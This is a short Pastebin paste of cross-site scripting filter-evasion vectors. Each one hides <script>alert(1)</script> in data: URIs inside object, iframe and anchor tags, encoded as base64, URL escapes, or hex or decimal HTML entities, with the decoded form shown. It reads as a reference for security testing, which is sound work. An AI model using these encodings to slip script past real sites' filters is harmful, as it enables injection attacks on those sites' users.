SHARE
TWEET

Encoded XSS Vectors

a guest Feb 19th, 2013 238 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. Base64 Encoded Vector:
  2. ---------------------
  3. <object data=data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg== ></object>
  4. where the base64 encoded value: PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg== is equal to
  5. <script>alert(1)</script>
  6.  
  7. URL Encoded Vector:
  8. -------------------
  9. <iframe src="data:text/html,%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%31%29%3C%2F
  10. %73%63%72%69%70%74%3E"></iframe>
  11. where %3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%31%29%3C%2F%73%63%72%69%70%74%3E is equal to
  12. <script>alert(1)</script>
  13.  
  14. Another variation of above vector where attacker only encoded angular brackets in order to evade
  15. the regular expression like:
  16.  
  17. <iframe src="data:text/html,%3Cscript%3Ealert(1)%3C/script%3E"></iframe>
  18.  
  19. Hex Entities Encoded Vector:
  20. ---------------------------
  21. <a href="data:text/html;blabla,&#x3C;&#x73;&#x63;&#x72;&#x69;&#x70;&#x74;&#x3E;&#x61;&#x6C;
  22. &#x65;&#x72;&#x74;&#x28;&#x31;&#x29;&#x3C;&#x2F;&#x73;&#x63;&#x72;&#x69;&#x70;&#x74;&#x3E;">X</a>
  23.  
  24. where &#x3C;&#x73;&#x63;&#x72;&#x69;&#x70;&#x74;&#x3E;&#x61;&#x6C;
  25. &#x65;&#x72;&#x74;&#x28;&#x31;&#x29;&#x3C;&#x2F;&#x73;&#x63;&#x72;&#x69;&#x70;&#x74;&#x3E; is
  26. equal to <script>alert(1)</script>
  27.  
  28. Decimal Entities Encoded Vector:
  29. -------------------------------
  30. <a href="data:text/html;blabla,&#60&#115&#99&#114&#105&#112&#116&#62&#97&#108&#101&#114&#116&#40
  31. &#49&#41&#60&#47&#115&#99&#114&#105&#112&#116&#62">X</a>
  32.  
  33. where &#60&#115&#99&#114&#105&#112&#116&#62&#97&#108&#101&#114&#116&#40
  34. &#49&#41&#60&#47&#115&#99&#114&#105&#112&#116&#62 is equal to <script>alert(1)</script>
RAW Paste Data
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy. OK, I Understand
 
Top